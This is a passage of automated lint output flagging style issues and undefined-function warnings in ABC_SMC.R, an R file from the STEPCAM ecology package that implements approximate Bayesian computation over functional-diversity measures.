^~~~~~\n```\n[R/ABC_SMC.R:95:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:99:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:103:21:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:3:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:25:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:116:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:117:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L117) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:123:11:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L123) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:123:31:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L123) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:141:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L141) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:142:28:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:142:28:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L142) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:150:12:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L150) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:150:29:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L150) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L154) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:35:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:157:45:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:157:55:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:186:20:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L186) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:186:20:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L186) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L187) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L192) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L198) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L201) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L203) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:27:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:208:18:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:209:18:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:213:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:214:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:215:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:11:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:23:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:39:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L219) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:53:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:222:63:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:223:29:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:21:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L232) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                   ~^~\n```\n[R/ABC_SMC.R:232:22:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:234:13:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:38:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:241:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L241) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:241:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L241) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:242:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:242:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:243:5:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:243:17:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:244:16:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L244) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:21:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:246:31:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:246:41:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:246:51:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:247:21:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:247:29:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:247:37:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:248:54:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L248) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:251:1:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L251) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:19:](https://github.com/thijsjanzen/STEPCAM/blob/11ade1443ea9c455154b908f5f927b78723f725b/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  